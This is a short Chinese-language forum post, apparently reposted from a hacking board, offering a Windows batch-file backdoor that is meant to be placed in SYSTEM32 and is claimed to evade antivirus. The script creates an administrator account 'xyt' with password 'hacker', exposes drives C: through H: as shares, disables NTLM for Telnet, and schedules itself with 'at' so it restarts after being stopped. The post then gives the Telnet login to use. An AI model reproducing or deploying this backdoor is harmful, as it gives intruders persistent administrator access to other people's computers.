这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下： 
  @echo off 
  @attrib +s + r xyt.bat
  @net user xyt hacker /add 
  @net localgroup administrators xyt /add 
  @net share c$=c: 
  @net share d$=d:
  @net share e$=e:
  @net share f$=f:
  @net share g$=g:
  @net share h$=h:
  @tlntadmn config sec = -ntlm
  @net stop schedule
  @net start Schedule
  @echo at 11:00 c:/WINNT/SYSTEM32/log.bat > c:/WINNT/SYSTEM32/xyt.bat 
  @echo at 23:00 c:/WINNT/SYSTEM32/log.bat >> c:/WINNT/SYSTEM32/xyt.bat 
  @at 11:05 c:/WINNT/SYSTEM32/xyt.bat 
  @at 23:05 c:/WINNT/SYSTEM32/xyt.bat 
  @net stop telnet 
  @net start telnet 
  @exit 
  这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，呵呵~~
  运行后TELNET IP上去，用户名为xyt，密码为hacker。
文章出处：
http://blackdream.5d6d.com/viewthread.php?tid=358&extra=page%3D1&frombbs=1